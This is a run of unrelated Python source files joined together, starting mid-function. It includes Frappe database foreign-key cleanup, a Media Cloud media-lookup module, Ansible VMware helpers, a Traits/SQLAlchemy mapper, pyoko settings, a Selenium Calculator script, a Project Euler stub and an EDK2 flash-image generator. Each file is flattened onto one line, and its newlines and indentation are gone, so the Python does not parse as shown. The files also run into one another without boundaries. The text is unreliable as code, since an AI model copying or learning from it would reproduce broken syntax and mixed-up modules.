frappe.db.commit() for t in frappe.db.sql("select name from tabDocType where issingle=0"): dbtab = DbTable(t[0]) try: fklist = dbtab.get_foreign_keys() except Exception as e: if e.args[0]==1146: fklist = [] else: raise for f in fklist: frappe.db.sql("alter table `tab%s` drop foreign key `%s`" % (t[0], f[1])) def get_definition(fieldtype, precision=None, length=None): d = type_map.get(fieldtype) if not d: return coltype = d[0] size = None if d[1]: size = d[1] if size: if fieldtype in ["Float", "Currency", "Percent"] and cint(precision) > 6: size = '21,9' if coltype == "varchar" and length: size = length if size is not None: coltype = "{coltype}({size})".format(coltype=coltype, size=size) return coltype def add_column(doctype, column_name, fieldtype, precision=None): if column_name in frappe.db.get_table_columns(doctype): # already exists return frappe.db.commit() frappe.db.sql("alter table `tab%s` add column %s %s" % (doctype, column_name, get_definition(fieldtype, precision)))
"""Creating and finding media within topics.""" import re import time import typing from mediawords.db import DatabaseHandler from mediawords.db.locks import get_session_lock from mediawords.util.log import create_logger from mediawords.util.url import normalize_url_lossy log = create_logger(__name__) # url and name length limits necessary to fit within postgres field MAX_URL_LENGTH = 1024 MAX_NAME_LENGTH = 124 # try appending this to urls to generate a unique url for get_unique_medium_url() URL_SPIDERED_SUFFIX = '#spider' # names for spidered tag and tag set SPIDERED_TAG_TAG = 'spidered' SPIDERED_TAG_SET = 'spidered' # retry query for new unique name to avoid race condition _GUESS_MEDIUM_RETRIES = 5 class McTopicMediaException(Exception): """Exception arising from this package.""" pass class McTopicMediaUniqueException(McTopicMediaException): """Exception raised when guess_medium is unable to find a unique name or url for a new media source.""" pass def _normalize_url(url: str) -> str: """Cap max length of url and run through normalize_url_lossy().""" nu = normalize_url_lossy(url) if nu is None: nu = url return nu[0:MAX_URL_LENGTH] def generate_medium_url_and_name_from_url(story_url: str) -> tuple: """Derive the url and a media source name from a story url. This function just returns the pathless normalized url as the medium_url and the host nane as the medium name. Arguments: url - story url Returns: tuple in the form (medium_url, medium_name) """ normalized_url = _normalize_url(story_url) matches = re.search(r'(http.?://([^/]+))', normalized_url, flags=re.I) if matches is None: log.warning("Unable to find host name in url: normalized_url (%s)" % story_url) return story_url, story_url (medium_url, medium_name) = (matches.group(1).lower(), matches.group(2).lower()) if not medium_url.endswith('/'): medium_url += "/" return medium_url, medium_name def _normalized_urls_out_of_date(db: DatabaseHandler) -> bool: """Return True iff there is at least one medium with a null normalized_url.""" null_medium = db.query("select * from media where normalized_url is null limit 1").hash() return null_medium is not None def _update_media_normalized_urls(db: DatabaseHandler) -> None: """Keep normalized_url field in media table up to date. Set the normalized_url field of any row in media for which it is null. Take care to lock the process so that only one process is doing this work at a time. """ # put a lock on this because the process of generating all media urls will take a couple hours, and we don't # want all workers to do the work locked = False while not locked: if not _normalized_urls_out_of_date(db): return db.begin() # poll instead of block so that we can releae the transaction and see whether someone else has already # updated all of the media locked = get_session_lock(db, 'MediaWords::TM::Media::media_normalized_urls', 1, wait=False) if not locked: db.commit() log.info("sleeping for media_normalized_urls lock...") time.sleep(1) log.warning("updating media_normalized_urls ...") media = db.query("select * from media where normalized_url is null").hashes() i = 0 total = len(media) for medium in media: i += 1 normalized_url = normalize_url_lossy(medium['url']) if normalized_url is None: normalized_url = medium['url'] log.info("[%d/%d] adding %s (%s)" % (i, total, medium['name'], normalized_url)) db.update_by_id('media', medium['media_id'], {'normalized_url': normalized_url}) db.commit() def lookup_medium(db: DatabaseHandler, url: str, name: str) -> typing.Optional[dict]: """Lookup a media source by normalized url and then name. Uses normalize_url_lossy() to normalize urls. Returns the parent media for duplicate media sources and returns no media that are marked foreign_rss_links. This function queries the media.normalized_url field to find the matching urls. Because the normalization function is in python, we have to keep that denormalized_url field current from within python. This function is responsible for keeping the table up to date by filling the field for any media for which it is null. Arguments: db - db handle url - url to lookup name - name to lookup Returns: a media source dict or None """ _update_media_normalized_urls(db) nu = _normalize_url(url) lookup_query = """ select m.* from media m where m.normalized_url = %(a)s and foreign_rss_links = 'f' order by dup_media_id nulls last, media_id """ medium = db.query(lookup_query, {'a': nu}).hash() if medium is None: medium = db.query( "select m.* from media m where lower(m.name) = lower(%(a)s) and m.foreign_rss_links = false", {'a': name}).hash() if medium is None: return None if medium['dup_media_id'] is not None: media_cycle_lookup = dict() # type: dict while medium['dup_media_id'] is not None: if medium['media_id'] in media_cycle_lookup: raise McTopicMediaException('Cycle found in duplicate media path: ' + str(media_cycle_lookup.keys())) media_cycle_lookup[medium['media_id']] = True medium = db.query("select * from media where media_id = %(a)s", {'a': medium['dup_media_id']}).hash() if medium['foreign_rss_links']: raise McTopicMediaException('Parent duplicate media source %d has foreign_rss_links' % medium['media_id']) return medium def get_unique_medium_name(db: DatabaseHandler, names: list) -> str: """Return the first name in the names list that does not yet exist for a media source, or None.""" for name in names: name = name[0:MAX_NAME_LENGTH] name_exists = db.query("select 1 from media where lower(name) = lower(%(a)s)", {'a': name}).hash() if name_exists is None: return name raise McTopicMediaUniqueException("Unable to find unique name among names: " + str(names)) def get_unique_medium_url(db: DatabaseHandler, urls: list) -> str: """Return the first url in the list that does not yet exist for a media source, or None. If no unique urls are found, trying appending '#spider' to each of the urls. """ spidered_urls = [u + URL_SPIDERED_SUFFIX for u in urls] urls = urls + spidered_urls for url in urls: url = url[0:MAX_URL_LENGTH] url_exists = db.query("select 1 from media where url = %(a)s", {'a': url}).hash() if url_exists is None: return url raise McTopicMediaUniqueException("Unable to find unique url among urls: " + str(urls)) def get_spidered_tag(db: DatabaseHandler) -> dict: """Return the spidered:spidered tag dict.""" spidered_tag = db.query( """ select t.* from tags t join tag_sets ts using ( tag_sets_id ) where t.tag = %(a)s and ts.name = %(b)s """, {'a': SPIDERED_TAG_TAG, 'b': SPIDERED_TAG_SET}).hash() if spidered_tag is None: tag_set = db.find_or_create('tag_sets', {'name': SPIDERED_TAG_SET}) spidered_tag = db.find_or_create('tags', {'tag': SPIDERED_TAG_TAG, 'tag_sets_id': tag_set['tag_sets_id']}) return spidered_tag def guess_medium(db: DatabaseHandler, story_url: str) -> dict: """Guess the media source for a story with the given url. The guess is based on a normalized version of the host part of the url. The guess takes into account the duplicate media relationships included in the postgres database through the media.dup_media_id fields. If no appropriate media source exists, this function will create a new one and return it. """ (medium_url, medium_name) = generate_medium_url_and_name_from_url(story_url) medium = lookup_medium(db, medium_url, medium_name) if medium is not None: return medium normalized_medium_url = _normalize_url(medium_url) normalized_story_url = _normalize_url(story_url) all_urls = [normalized_medium_url, medium_url, normalized_story_url, story_url] # avoid conflicts with existing media names and urls that are missed # by the above query b/c of dups feeds or foreign_rss_links medium_name = get_unique_medium_name(db, [medium_name] + all_urls) medium_url = get_unique_medium_url(db, all_urls) # a race condition with another thread can cause this to fail sometimes, but after the medium in the # other process has been created, all should be fine for i in range(_GUESS_MEDIUM_RETRIES): medium_data = {'name': medium_name, 'url': medium_url, 'normalized_url': normalized_medium_url} medium = db.find_or_create('media', medium_data) if medium is not None: break else: time.sleep(1) if medium is None: raise McTopicMediaUniqueException( "Unable to find or create medium for %s / %s" % (medium_name, medium_url)) log.info("add medium: %s / %s / %d" % (medium_name, medium_url, medium['media_id'])) spidered_tag = get_spidered_tag(db) db.find_or_create('media_tags_map', {'media_id': medium['media_id'], 'tags_id': spidered_tag['tags_id']}) return medium
# -*- coding: utf-8 -*- # (c) 2015, Joseph Callen <jcallen () csc.com> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. try: import atexit import time import ssl # requests is required for exception handling of the ConnectionError import requests from pyVim import connect from pyVmomi import vim HAS_PYVMOMI = True except ImportError: HAS_PYVMOMI = False class TaskError(Exception): pass def wait_for_task(task): while True: if task.info.state == vim.TaskInfo.State.success: return True, task.info.result if task.info.state == vim.TaskInfo.State.error: try: raise TaskError(task.info.error) except AttributeError: raise TaskError("An unknown error has occurred") if task.info.state == vim.TaskInfo.State.running: time.sleep(15) if task.info.state == vim.TaskInfo.State.queued: time.sleep(15) def find_dvspg_by_name(dv_switch, portgroup_name): portgroups = dv_switch.portgroup for pg in portgroups: if pg.name == portgroup_name: return pg return None def find_entity_child_by_path(content, entityRootFolder, path): entity = entityRootFolder searchIndex = content.searchIndex paths = path.split("/") try: for path in paths: entity = searchIndex.FindChild (entity, path) if entity.name == paths[-1]: return entity except: pass return None # Maintain for legacy, or remove with 2.1 ? # Should be replaced with find_cluster_by_name def find_cluster_by_name_datacenter(datacenter, cluster_name): host_folder = datacenter.hostFolder for folder in host_folder.childEntity: if folder.name == cluster_name: return folder return None def find_cluster_by_name(content, cluster_name, datacenter=None): if datacenter: folder = datacenter.hostFolder else: folder = content.rootFolder clusters = get_all_objs(content, [vim.ClusterComputeResource], folder) for cluster in clusters: if cluster.name == cluster_name: return cluster return None def find_datacenter_by_name(content, datacenter_name): datacenters = get_all_objs(content, [vim.Datacenter]) for dc in datacenters: if dc.name == datacenter_name: return dc return None def find_dvs_by_name(content, switch_name): vmware_distributed_switches = get_all_objs(content, [vim.dvs.VmwareDistributedVirtualSwitch]) for dvs in vmware_distributed_switches: if dvs.name == switch_name: return dvs return None def find_hostsystem_by_name(content, hostname): host_system = get_all_objs(content, [vim.HostSystem]) for host in host_system: if host.name == hostname: return host return None def find_vm_by_id(content, vm_id, vm_id_type="vm_name", datacenter=None, cluster=None): """ UUID is unique to a VM, every other id returns the first match. """ si = content.searchIndex vm = None if vm_id_type == 'dns_name': vm = si.FindByDnsName(datacenter=datacenter, dnsName=vm_id, vmSearch=True) elif vm_id_type == 'inventory_path': vm = si.FindByInventoryPath(inventoryPath=vm_id) if type(vm) != type(vim.VirtualMachine): vm = None elif vm_id_type == 'uuid': vm = si.FindByUuid(datacenter=datacenter, instanceUuid=vm_id, vmSearch=True) elif vm_id_type == 'ip': vm = si.FindByIp(datacenter=datacenter, ip=vm_id, vmSearch=True) elif vm_id_type == 'vm_name': folder = None if cluster: folder = cluster elif datacenter: folder = datacenter.hostFolder vm = find_vm_by_name(content, vm_id, folder) return vm def find_vm_by_name(content, vm_name, folder=None, recurse=True): vms = get_all_objs(content, [vim.VirtualMachine], folder, recurse=True) for vm in vms: if vm.name == vm_name: return vm return None def find_host_portgroup_by_name(host, portgroup_name): for portgroup in host.config.network.portgroup: if portgroup.spec.name == portgroup_name: return portgroup return None def vmware_argument_spec(): return dict( hostname=dict(type='str', required=True), username=dict(type='str', aliases=['user', 'admin'], required=True), password=dict(type='str', aliases=['pass', 'pwd'], required=True, no_log=True), validate_certs=dict(type='bool', required=False, default=True), ) def connect_to_api(module, disconnect_atexit=True): hostname = module.params['hostname'] username = module.params['username'] password = module.params['password'] validate_certs = module.params['validate_certs'] if validate_certs and not hasattr(ssl, 'SSLContext'): module.fail_json(msg='pyVim does not support changing verification mode with python < 2.7.9. Either update python or or use validate_certs=false') try: service_instance = connect.SmartConnect(host=hostname, user=username, pwd=password) except vim.fault.InvalidLogin, invalid_login: module.fail_json(msg=invalid_login.msg, apierror=str(invalid_login)) except requests.ConnectionError, connection_error: if '[SSL: CERTIFICATE_VERIFY_FAILED]' in str(connection_error) and not validate_certs: context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) context.verify_mode = ssl.CERT_NONE service_instance = connect.SmartConnect(host=hostname, user=username, pwd=password, sslContext=context) else: module.fail_json(msg="Unable to connect to vCenter or ESXi API on TCP/443.", apierror=str(connection_error)) # Disabling atexit should be used in special cases only. # Such as IP change of the ESXi host which removes the connection anyway. # Also removal significantly speeds up the return of the module if disconnect_atexit: atexit.register(connect.Disconnect, service_instance) return service_instance.RetrieveContent() def get_all_objs(content, vimtype, folder=None, recurse=True): if not folder: folder = content.rootFolder obj = {} container = content.viewManager.CreateContainerView(folder, vimtype, recurse) for managed_object_ref in container.view: obj.update({managed_object_ref: managed_object_ref.name}) return obj
""" Utilities for mapping HasTraits classes to a relational database using SQLAlchemy. These tools are not declarative, like the Elixir extension. Rather, they just provide the low-level support for mapping an existing schema to traited classes. Your classes must subclass from HasDBTraits. Each mapped trait should have the "db_storage=True" metadata. Many of the traits have been subclassed here to provide this by default, e.g. DBInt, DBInstance, DBStr, etc. Many of these are also customized to accept None, too, in order to support SQL NULLs. The only collection trait supported is DBList. One cannot currently map Dict or Set traits. Instead of using sqlalchemy.orm.mapper() to declare mappers, use trait_mapper(). For 1:N and M:N relations that map to a DBList, use trait_list_relation() instead of sqlalchemy.orm.relation(). """ import weakref from sqlalchemy.orm import EXT_CONTINUE, MapperExtension, mapper, relation, session, reconstructor from sqlalchemy.orm.attributes import set_attribute from traits.api import (Any, Array, Either, Float, HasTraits, Instance, Int, List, Property, Python, Str, TraitListObject, on_trait_change) __all__ = ['MappedTraitListObject', 'DBList', 'DBAny', 'DBArray', 'DBFloat', 'DBInstance', 'DBInt', 'DBIntKey', 'DBStr', 'HasDBTraits', 'trait_list_relation', 'trait_mapper'] # A unique object to act as a dummy object for MappedTraitListObjects so we know # when they have been constructed outside of Traits. It needs to be a valid # HasTraits instance, but otherwise, nothing special. HAS_TRAITS_SENTINEL = HasTraits() class MappedTraitListObject(TraitListObject): """ TraitListObject decorated for SQLAlchemy relations. """ __emulates__ = list def __init__(self, *args, **kwds): if not args and not kwds: args = (DBList(), HAS_TRAITS_SENTINEL, '__fake', []) TraitListObject.__init__(self, *args, **kwds) # FIXME: Fix Traits so we don't need this hack. class WeirdInt(int): """ Work around a missing feature in Traits. Traits uses the default_value_type to determine if a trait is a List, Dict, etc. through a dict lookup for deciding if it is going to add the *_items events. List subclasses need to use a different default_value_type, though, so we'll pretend that we look like a list (default_value_type=5). The other place where Traits uses the default_value_type is in the C code, where it converts it to a C int, so it will get the real value of "8" there. Horrible, horrible hack. I am not proud. """ def __hash__(self): return hash(5) def __eq__(self, other): if other == 5: return True else: return int(self) == other class DBList(List): """ Subclass of List traits to use SQLAlchemy mapped lists. """ default_value_type = WeirdInt(8) def __init__(self, *args, **kwds): kwds['db_storage'] = True List.__init__(self, *args, **kwds) # Set up the Type-8 initializer. self.real_default_value = self.default_value def type8_init(obj): # Handle the conversion to a MappedTraitListObject in the validator. return self.real_default_value self.default_value = type8_init def validate(self, object, name, value): """ Validates that the values is a valid list. """ if (isinstance(value, list) and (self.minlen <= len(value) <= self.maxlen)): if object is None: return value if hasattr(object, '_state'): # Object has been mapped. attr = getattr(object.__class__, name) _, list_obj = attr.impl._build_collection(object._state) # Add back the Traits-specified information. list_obj.__init__(self, object, name, value) else: # Object has not been mapped, yet. list_obj = MappedTraitListObject(self, object, name, value) return list_obj self.error(object, name, value) class DBAny(Any): def __init__(self, *args, **kwds): kwds['db_storage'] = True super(DBAny, self).__init__(*args, **kwds) class DBInstance(Instance): def __init__(self, *args, **kwds): kwds['db_storage'] = True super(DBInstance, self).__init__(*args, **kwds) class DBArray(Array): def __init__(self, *args, **kwds): kwds['db_storage'] = True super(DBArray, self).__init__(*args, **kwds) class DBInt(Either): def __init__(self, **kwds): kwds['db_storage'] = True kwds['default'] = 0 super(DBInt, self).__init__(Int, None, **kwds) class DBIntKey(Either): def __init__(self, **kwds): kwds['db_storage'] = True super(DBIntKey, self).__init__(None, Int, **kwds) class DBUUID(Any): def __init__(self, *args, **kwds): kwds['db_storage'] = True super(DBUUID, self).__init__(*args, **kwds) class DBFloat(Either): def __init__(self, **kwds): kwds['db_storage'] = True kwds['default'] = 0.0 super(DBFloat, self).__init__(Float, None, **kwds) class DBStr(Either): def __init__(self, **kwds): kwds['db_storage'] = True kwds['default'] = '' super(DBStr, self).__init__(Str, None, **kwds) def _fix_dblist(object, value, trait_name, trait): """ Fix MappedTraitListObject values for DBList traits that do not have the appropriate metadata. No-op for non-DBList traits, so it may be used indiscriminantly. """ if isinstance(trait.handler, DBList): if value.object() is HAS_TRAITS_SENTINEL: value.object = weakref.ref(object) value.name = trait_name value.name_items = trait_name + '_items' value.trait = trait.handler class HasDBTraits(HasTraits): """ Base class providing the necessary connection to the SQLAlchemy mapper. """ @reconstructor def init_on_load(self): """ This will make sure that the HasTraits machinery is hooked up so that things like @on_trait_change() will work. """ super(HasDBTraits, self).__init__() # Check for bad DBList traits. for trait_name, trait in self.traits(db_storage=True).items(): value = self.trait_get(trait_name)[trait_name] _fix_dblist(self, value, trait_name, trait) # The SQLAlchemy Session this object belongs to. _session = Property() # Any implicit traits added by SQLAlchemy are transient and should not be # copied through .clone_traits(), copy.copy(), or pickling. _ = Python(transient=True) def _get__session(self): return session.object_session(self) @on_trait_change('+db_storage') def _tell_sqlalchemy(self, object, trait_name, old, new): """ If the trait being changed has db_storage metadata, set dirty flag. Returns ------- If self is linked to a SQLAlchemy session and the conditions have been met then the dirty flag on the SQLAlchemy metadata will be set. Description ----------- HasTrait bypasses the default class attribute getter and setter which in turn causes SQLAlchemy to fail to detect that a class has data to be flushed. As a work-around we must manually set the SQLAlchemy dirty flag when one of our db_storage traits has been changed. """ if hasattr(self, '_sa_instance_state'): trait = self.trait(trait_name) # Use the InstrumentedAttribute descriptor on this class inform # SQLAlchemy of the changes. instr = getattr(self.__class__, trait_name) # SQLAlchemy looks at the __dict__ for information. Fool it. self.__dict__[trait_name] = old _fix_dblist(self, new, trait_name, trait) instr.__set__(self, new) # The value may have been replaced. Fix it again. new = self.trait_get(trait_name)[trait_name] _fix_dblist(self, new, trait_name, trait) self.__dict__[trait_name] = new return def trait_list_relation(argument, secondary=None, collection_class=MappedTraitListObject, **kwargs): """ An eager relation mapped to a List trait. The arguments are the same as sqlalchemy.orm.relation(). """ kwargs['lazy'] = False return relation(argument, secondary=secondary, collection_class=collection_class, **kwargs) class TraitMapperExtension(MapperExtension): """ Create HasDBTraits instances correctly. """ def create_instance(self, mapper, selectcontext, row, class_): """ Create HasDBTraits instances correctly. This will make sure that the HasTraits machinery is hooked up so that things like @on_trait_change() will work. """ if issubclass(class_, HasTraits): obj = mapper.class_manager.new_instance(class_) HasTraits.__init__(obj) return obj else: return EXT_CONTINUE def populate_instance(self, mapper, selectcontext, row, instance, **flags): """ Receive a newly-created instance before that instance has its attributes populated. This will fix up any MappedTraitListObject values which were created without the appropriate metadata. """ if isinstance(instance, HasTraits): mapper.populate_instance(selectcontext, instance, row, **flags) # Check for bad DBList traits. for trait_name, trait in instance.traits(db_storage=True).items(): value = instance.trait_get(trait_name)[trait_name] _fix_dblist(instance, value, trait_name, trait) else: return EXT_CONTINUE
# -*- coding: utf-8 -*- # Copyright (C) 2015 ZetaOps Inc. # # This file is licensed under the GNU General Public License v3 # (GPLv3). See LICENSE.txt for details. """ Default Settings """ import os DEFAULT_BUCKET_TYPE = os.environ.get('DEFAULT_BUCKET_TYPE', 'pyoko_models') # write_once bucket doesn't support secondary indexes. Thus, backend is defined # as "leveldb_mult" in log_version bucket properties. VERSION_LOG_BUCKET_TYPE = os.environ.get('VERSION_LOG_BUCKET_TYPE', 'log_version') RIAK_SERVER = os.environ.get('RIAK_SERVER', 'localhost') RIAK_PROTOCOL = os.environ.get('RIAK_PROTOCOL', 'http') RIAK_PORT = os.environ.get('RIAK_PORT', 8098) RIAK_HTTP_PORT = os.environ.get('RIAK_HTTP_PORT', 8098) #: Redis address and port. REDIS_SERVER = os.environ.get('REDIS_SERVER', '127.0.0.1:6379') #: Redis password (password). REDIS_PASSWORD = os.environ.get('REDIS_PASSWORD', None) #: Set True to enable versioning on write-once buckets ENABLE_VERSIONS = os.environ.get('ENABLE_VERSIONS', 'False') == 'True' #: Suffix for version buckets VERSION_SUFFIX = os.environ.get('VERSION_SUFFIX', '_version') #: Set True to enable auto-logging of all DB operations to a #: write-once log bucket ENABLE_ACTIVITY_LOGGING = os.environ.get('ENABLE_ACTIVITY_LOGGING', 'False') == 'True' #: Set the name of logging bucket type and bucket name. ACTIVITY_LOGGING_BUCKET = os.environ.get('ACTIVITY_LOGGING_BUCKET', 'log') VERSION_BUCKET = os.environ.get('VERSION_BUCKET', 'version') #: Set True to enable caching all models to Redis ENABLE_CACHING = os.environ.get('ENABLE_CACHING', 'False') == 'True' #: Set True to enable caching all models to Redis CACHE_EXPIRE_DURATION = os.environ.get('CACHE_EXPIRE_DURATION', 36000)
# coding=utf-8 from selenium import webdriver from selenium.webdriver import ActionChains from selenium.webdriver.common.keys import Keys from random import randint import time import utilities driver = utilities.startWebDriverSession('http://localhost:4622/wd/hub') driver.get("Calculator") driver.add_cookie({'name': 'mouse_speed', 'value': 40}) def clickElement(xPath): element = driver.find_element_by_xpath(xPath) ActionChains(driver).move_to_element(element).click().perform() #AC clickElement("/AXApplication[@AXTitle='Calculator']/AXWindow[@AXIdentifier='_NS:477' and @AXSubrole='AXStandardWindow']/AXGroup[@AXIdentifier='_NS:696']/AXButton[@AXIdentifier='_NS:752']") #View Menu clickElement("/AXApplication[@AXTitle='Calculator']/AXMenuBar[0]/AXMenuBarItem[@AXTitle='View']") #Scientific Menu Item clickElement("/AXApplication[@AXTitle='Calculator']/AXMenuBar[0]/AXMenuBarItem[@AXTitle='View']/AXMenu[0]/AXMenuItem[@AXTitle='Scientific']") #Pi clickElement("/AXApplication[@AXTitle='Calculator']/AXWindow[@AXIdentifier='_NS:477' and @AXSubrole='AXStandardWindow']/AXGroup[@AXIdentifier='_NS:145']/AXButton[@AXIdentifier='_NS:317']") #x3 clickElement("/AXApplication[@AXTitle='Calculator']/AXWindow[@AXIdentifier='_NS:477' and @AXSubrole='AXStandardWindow']/AXGroup[@AXIdentifier='_NS:145']/AXButton[@AXIdentifier='_NS:252']") #ex clickElement("/AXApplication[@AXTitle='Calculator']/AXWindow[@AXIdentifier='_NS:477' and @AXSubrole='AXStandardWindow']/AXGroup[@AXIdentifier='_NS:145']/AXButton[@AXTitle='e to the x' and @AXIdentifier='_NS:416']") #10x clickElement("/AXApplication[@AXTitle='Calculator']/AXWindow[@AXIdentifier='_NS:477' and @AXSubrole='AXStandardWindow']/AXGroup[@AXIdentifier='_NS:145']/AXButton[@AXTitle='ten to the x' and @AXIdentifier='_NS:361']") time.sleep(3) #closeButton clickElement("/AXApplication[@AXTitle='Calculator']/AXWindow[@AXIdentifier='_NS:477' and @AXSubrole='AXStandardWindow']/AXButton[@AXSubrole='AXCloseButton']")
# -*- coding: utf-8 -*- # ProjectEuler/src/python/problem075.py # # Singular integer right triangles # ================================ # Published on Friday, 30th July 2004, 06:00 pm # # It turns out that 12 cm is the smallest length of wire that can be bent to # form an integer sided right angle triangle in exactly one way, but there are # many more examples. 12 cm: (3,4,5) 24 cm: (6,8,10) 30 cm: (5,12,13) 36 cm: # (9,12,15) 40 cm: (8,15,17) 48 cm: (12,16,20) In contrast, some lengths of # wire, like 20 cm, cannot be bent to form an integer sided right angle # triangle, and other lengths allow more than one solution to be found; for # example, using 120 cm it is possible to form exactly three different integer # sided right angle triangles. 120 cm: (30,40,50), (20,48,52), (24,45,51) Given # that L is the length of the wire, for how many values of L 1,500,000 can # exactly one integer sided right angle triangle be formed? import projecteuler as pe def main(): pass if __name__ == "__main__": main()
## @file # process FD generation # # Copyright (c) 2007, Intel Corporation. All rights reserved.<BR> # # This program and the accompanying materials # are licensed and made available under the terms and conditions of the BSD License # which accompanies this distribution. The full text of the license may be found at # http://opensource.org/licenses/bsd-license.php # # THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS, # WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED. # ## # Import Modules # import Region import Fv import os import StringIO import sys from struct import * from GenFdsGlobalVariable import GenFdsGlobalVariable from CommonDataClass.FdfClass import FDClassObject from Common import EdkLogger from Common.BuildToolError import * from Common.Misc import SaveFileOnChange from GenFds import GenFds ## generate FD # # class FD(FDClassObject): ## The constructor # # @param self The object pointer # def __init__(self): FDClassObject.__init__(self) ## GenFd() method # # Generate FD # # @retval string Generated FD file name # def GenFd (self): if self.FdUiName.upper() + 'fd' in GenFds.ImageBinDict.keys(): return GenFds.ImageBinDict[self.FdUiName.upper() + 'fd'] # # Print Information # GenFdsGlobalVariable.InfLogger("Fd File Name:%s" %self.FdUiName) Offset = 0x00 for item in self.BlockSizeList: Offset = Offset + item[0] * item[1] if Offset != self.Size: EdkLogger.error("GenFds", GENFDS_ERROR, 'FD %s Size not consistent with block array' % self.FdUiName) GenFdsGlobalVariable.VerboseLogger('Following Fv will be add to Fd !!!') for FvObj in GenFdsGlobalVariable.FdfParser.Profile.FvDict: GenFdsGlobalVariable.VerboseLogger(FvObj) GenFdsGlobalVariable.VerboseLogger('################### Gen VTF ####################') self.GenVtfFile() TempFdBuffer = StringIO.StringIO('') PreviousRegionStart = -1 PreviousRegionSize = 1 for RegionObj in self.RegionList : if RegionObj.RegionType == 'CAPSULE': continue if RegionObj.Offset + RegionObj.Size <= PreviousRegionStart: pass elif RegionObj.Offset <= PreviousRegionStart or (RegionObj.Offset >=PreviousRegionStart and RegionObj.Offset < PreviousRegionStart + PreviousRegionSize): pass elif RegionObj.Offset > PreviousRegionStart + PreviousRegionSize: GenFdsGlobalVariable.InfLogger('Padding region starting from offset 0x%X, with size 0x%X' %(PreviousRegionStart + PreviousRegionSize, RegionObj.Offset - (PreviousRegionStart + PreviousRegionSize))) PadRegion = Region.Region() PadRegion.Offset = PreviousRegionStart + PreviousRegionSize PadRegion.Size = RegionObj.Offset - PadRegion.Offset PadRegion.AddToBuffer(TempFdBuffer, self.BaseAddress, self.BlockSizeList, self.ErasePolarity, GenFds.ImageBinDict, self.vtfRawDict, self.DefineVarDict) PreviousRegionStart = RegionObj.Offset PreviousRegionSize = RegionObj.Size # # Call each region's AddToBuffer function # if PreviousRegionSize > self.Size: pass GenFdsGlobalVariable.VerboseLogger('Call each region\'s AddToBuffer function') RegionObj.AddToBuffer (TempFdBuffer, self.BaseAddress, self.BlockSizeList, self.ErasePolarity, GenFds.ImageBinDict, self.vtfRawDict, self.DefineVarDict) FdBuffer = StringIO.StringIO('') PreviousRegionStart = -1 PreviousRegionSize = 1 for RegionObj in self.RegionList : if RegionObj.Offset + RegionObj.Size <= PreviousRegionStart: EdkLogger.error("GenFds", GENFDS_ERROR, 'Region offset 0x%X in wrong order with Region starting from 0x%X, size 0x%X\nRegions in FDF must have offsets appear in ascending order.'\ % (RegionObj.Offset, PreviousRegionStart, PreviousRegionSize)) elif RegionObj.Offset <= PreviousRegionStart or (RegionObj.Offset >=PreviousRegionStart and RegionObj.Offset < PreviousRegionStart + PreviousRegionSize): EdkLogger.error("GenFds", GENFDS_ERROR, 'Region offset 0x%X overlaps with Region starting from 0x%X, size 0x%X' \ % (RegionObj.Offset, PreviousRegionStart, PreviousRegionSize)) elif RegionObj.Offset > PreviousRegionStart + PreviousRegionSize: GenFdsGlobalVariable.InfLogger('Padding region starting from offset 0x%X, with size 0x%X' %(PreviousRegionStart + PreviousRegionSize, RegionObj.Offset - (PreviousRegionStart + PreviousRegionSize))) PadRegion = Region.Region() PadRegion.Offset = PreviousRegionStart + PreviousRegionSize PadRegion.Size = RegionObj.Offset - PadRegion.Offset PadRegion.AddToBuffer(FdBuffer, self.BaseAddress, self.BlockSizeList, self.ErasePolarity, GenFds.ImageBinDict, self.vtfRawDict, self.DefineVarDict) PreviousRegionStart = RegionObj.Offset PreviousRegionSize = RegionObj.Size # # Verify current region fits within allocated FD section Size # if PreviousRegionStart + PreviousRegionSize > self.Size: EdkLogger.error("GenFds", GENFDS_ERROR, 'FD %s size too small to fit region with offset 0x%X and size 0x%X' % (self.FdUiName, PreviousRegionStart, PreviousRegionSize)) # # Call each region's AddToBuffer function # GenFdsGlobalVariable.VerboseLogger('Call each region\'s AddToBuffer function') RegionObj.AddToBuffer (FdBuffer, self.BaseAddress, self.BlockSizeList, self.ErasePolarity, GenFds.ImageBinDict, self.vtfRawDict, self.DefineVarDict) # # Create a empty Fd file # GenFdsGlobalVariable.VerboseLogger ('Create an empty Fd file') FdFileName = os.path.join(GenFdsGlobalVariable.FvDir,self.FdUiName + '.fd') # # Write the buffer contents to Fd file # GenFdsGlobalVariable.VerboseLogger('Write the buffer contents to Fd file') SaveFileOnChange(FdFileName, FdBuffer.getvalue()) FdBuffer.close(); GenFds.ImageBinDict[self.FdUiName.upper() + 'fd'] = FdFileName return FdFileName ## generate VTF # # @param self The object pointer # def GenVtfFile (self) : # # Get this Fd's all Fv name # FvAddDict ={} FvList = [] for RegionObj in self.RegionList: if RegionObj.RegionType == 'FV': if len(RegionObj.RegionDataList) == 1: RegionData = RegionObj.RegionDataList[0] FvList.append(RegionData.upper()) FvAddDict[RegionData.upper()] = (int(self.BaseAddress,16) + \ RegionObj.Offset, RegionObj.Size) else: Offset = RegionObj.Offset for RegionData in RegionObj.RegionDataList: FvList.append(RegionData.upper()) FvObj = GenFdsGlobalVariable.FdfParser.Profile.FvDict.get(RegionData.upper()) if len(FvObj.BlockSizeList) < 1: EdkLogger.error("GenFds", GENFDS_ERROR, 'FV.%s must point out FVs blocksize and Fv BlockNum' \ % FvObj.UiFvName) else: Size = 0 for blockStatement in FvObj.BlockSizeList: Size = Size + blockStatement[0] * blockStatement[1] FvAddDict[RegionData.upper()] = (int(self.BaseAddress,16) + \ Offset, Size) Offset = Offset + Size # # Check whether this Fd need VTF # Flag = False for VtfObj in GenFdsGlobalVariable.FdfParser.Profile.VtfList: compLocList = VtfObj.GetFvList() if set(compLocList).issubset(FvList): Flag = True break if Flag == True: self.vtfRawDict = VtfObj.GenVtf(FvAddDict) ## generate flash map file # # @param self The object pointer # def GenFlashMap (self): pass
